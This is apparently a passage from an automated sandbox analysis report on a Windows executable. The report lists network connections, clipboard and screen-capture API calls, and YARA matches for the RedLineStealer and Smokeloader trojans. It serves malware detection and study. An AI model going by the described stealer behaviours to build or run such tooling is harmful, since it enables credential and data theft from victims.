                  Source: unknownHTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.10:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.10:49756 version: TLS 1.2
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep, | 0_2_004016DF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_02491942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep, | 0_2_02491942
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, | 3_2_00431839

                  System Summary

                  Source: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_02492361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC, | 0_2_02492361
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_02492605 NtdllDefWindowProc_W,PostQuitMessage, | 0_2_02492605
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00428022 | 0_2_00428022
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004071AB | 0_2_004071AB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004373D9 | 0_2_004373D9
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0042D4EE | 0_2_0042D4EE
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00427484 | 0_2_00427484
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00428560 | 0_2_00428560
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0043D678 | 0_2_0043D678
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004166AF | 0_2_004166AF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00413725 | 0_2_00413725
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004277F6 | 0_2_004277F6
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0040E974 | 0_2_0040E974
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0042EAE0 | 0_2_0042EAE0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00427AA0 | 0_2_00427AA0
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00418AAF | 0_2_00418AAF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00436CBF | 0_2_00436CBF
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00427D67 | 0_2_00427D67
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00413F0B | 0_2_00413F0B
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B8289 | 0_2_024B8289
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024BED47 | 0_2_024BED47
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A4172 | 0_2_024A4172
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B76EB | 0_2_024B76EB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024BD755 | 0_2_024BD755
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B87C7 | 0_2_024B87C7
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B7A5D | 0_2_024B7A5D
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0249EBDB | 0_2_0249EBDB
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A6916 | 0_2_024A6916
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A398C | 0_2_024A398C
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C6F26 | 0_2_024C6F26
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B7FCE | 0_2_024B7FCE
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B7D07 | 0_2_024B7D07
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A8D16 | 0_2_024A8D16
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0040B44C | 3_2_0040B44C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00408790 | 3_2_00408790
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00426054 | 3_2_00426054
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043B068 | 3_2_0043B068
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00414070 | 3_2_00414070
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043C020 | 3_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00439830 | 3_2_00439830
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043D830 | 3_2_0043D830
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0041B0E1 | 3_2_0041B0E1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0041F0E0 | 3_2_0041F0E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004210E0 | 3_2_004210E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00435890 | 3_2_00435890
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00434098 | 3_2_00434098
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043D0A0 | 3_2_0043D0A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004180A9 | 3_2_004180A9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0040A940 | 3_2_0040A940
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0041714B | 3_2_0041714B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0040C917 | 3_2_0040C917
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0042B12C | 3_2_0042B12C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0042F130 | 3_2_0042F130
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0042B1C0 | 3_2_0042B1C0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0041D9E0 | 3_2_0041D9E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004361E0 | 3_2_004361E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004111E5 | 3_2_004111E5
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004059F0 | 3_2_004059F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_004239F2 | 3_2_004239F2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043C1F0 | 3_2_0043C1F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0040F9FD | 3_2_0040F9FD
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00425990 | 3_2_00425990
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0043B9A1 | 3_2_0043B9A1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00406250 | 3_2_00406250
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_0041D270 | 3_2_0041D270
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 3_2_00424A74 | 3_2_00424A74
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004092303_2_00409230
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00423A343_2_00423A34
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004192DA3_2_004192DA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043D2F03_2_0043D2F0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043C2803_2_0043C280
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004152983_2_00415298
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004082AE3_2_004082AE
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004252BA3_2_004252BA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041CB053_2_0041CB05
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00428BC03_2_00428BC0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00402BD03_2_00402BD0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00428BE93_2_00428BE9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004373993_2_00437399
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004393A03_2_004393A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00416BA53_2_00416BA5
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004293AA3_2_004293AA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004223B83_2_004223B8
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00436C003_2_00436C00
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004234103_2_00423410
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042B4FC3_2_0042B4FC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00404CB03_2_00404CB0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004074B03_2_004074B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041DD503_2_0041DD50
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004185783_2_00418578
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042D57E3_2_0042D57E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004245023_2_00424502
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00421D103_2_00421D10
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0040DD253_2_0040DD25
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041D5E03_2_0041D5E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004175823_2_00417582
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043D5803_2_0043D580
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00427DA23_2_00427DA2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004205B03_2_004205B0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C64A3_2_0042C64A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00426E503_2_00426E50
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042B4F73_2_0042B4F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004146243_2_00414624
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0043462A3_2_0043462A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004356303_2_00435630
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004066E03_2_004066E0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C6E43_2_0042C6E4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00430EF03_2_00430EF0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004256F93_2_004256F9
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00422E933_2_00422E93
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00425E903_2_00425E90
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004156A03_2_004156A0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041BEA03_2_0041BEA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00438EA03_2_00438EA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00435EA03_2_00435EA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00405EB03_2_00405EB0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041C6BB3_2_0041C6BB
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00415F663_2_00415F66
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004197703_2_00419770
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_004097003_2_00409700
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C7263_2_0042C726
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0042C7353_2_0042C735
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0041DF803_2_0041DF80
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_00402FA03_2_00402FA0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024932073_2_02493207
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CB2CF3_2_024CB2CF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C42FF3_2_024C42FF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A734A3_2_024A734A
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AB3483_2_024AB348
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B13473_2_024B1347
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AF3473_2_024AF347
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CD3073_2_024CD307
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024983C73_2_024983C7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB3933_2_024BB393
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BF3973_2_024BF397
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A73B23_2_024A73B2
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B80093_2_024B8009
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249C0E83_2_0249C0E8
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C11573_2_024C1157
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B81083_2_024B8108
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C91073_2_024C9107
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C61073_2_024C6107
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024961173_2_02496117
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AE1E73_2_024AE1E7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AC1AC3_2_024AC1AC
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C96073_2_024C9607
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B96113_2_024B9611
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB7633_2_024BB763
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024977173_2_02497717
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A87DF3_2_024A87DF
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CD7E73_2_024CD7E7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BD7E53_2_024BD7E5
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A144C3_2_024A144C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C64473_2_024C6447
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB4273_2_024BB427
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AD4D73_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024994973_2_02499497
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024964B73_2_024964B7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A95413_2_024A9541
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CD5573_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AC5283_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024945D73_2_024945D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C5AF73_2_024C5AF7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CDA973_2_024CDA97
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C9A973_2_024C9A97
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249CB7E3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B5BF73_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A7BA73_2_024A7BA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249ABA73_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AD8473_2_024AD847
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BB75E3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B08173_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C58973_2_024C5897
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C48913_2_024C4891
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC8B13_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC94B3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024969473_2_02496947
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024999673_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024AC9213_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A99D73_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024989F73_2_024989F7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC98D3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024BC99C3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024C6E673_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02492E373_2_02492E37
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B1F773_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02494F173_2_02494F17
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024A8F353_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249DF8C3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024ADFB73_2_024ADFB7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024ADC473_2_024ADC47
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02495C573_2_02495C57
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_0249FC643_2_0249FC64
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024CBC083_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_02493C273_2_02493C27
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B4CF43_2_024B4CF4
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 3_2_024B3C9B3_2_024B3C9B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: String function: 024981D7 appears 78 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: String function: 024A42C7 appears 74 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: String function: 00410720 appears 53 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: String function: 024A0987 appears 53 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: String function: 0040FDB2 appears 123 times
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: String function: 024A0019 appears 119 times
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860
                  Source: hpEAJnNwCB.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 91B1.tmp.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: hpEAJnNwCB.exe | Binary or memory string: OriginalFileName vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000003.1305902293.0000000002500000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe, 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs hpEAJnNwCB.exe
                  Source: hpEAJnNwCB.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: hpEAJnNwCB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 91B1.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@13/5
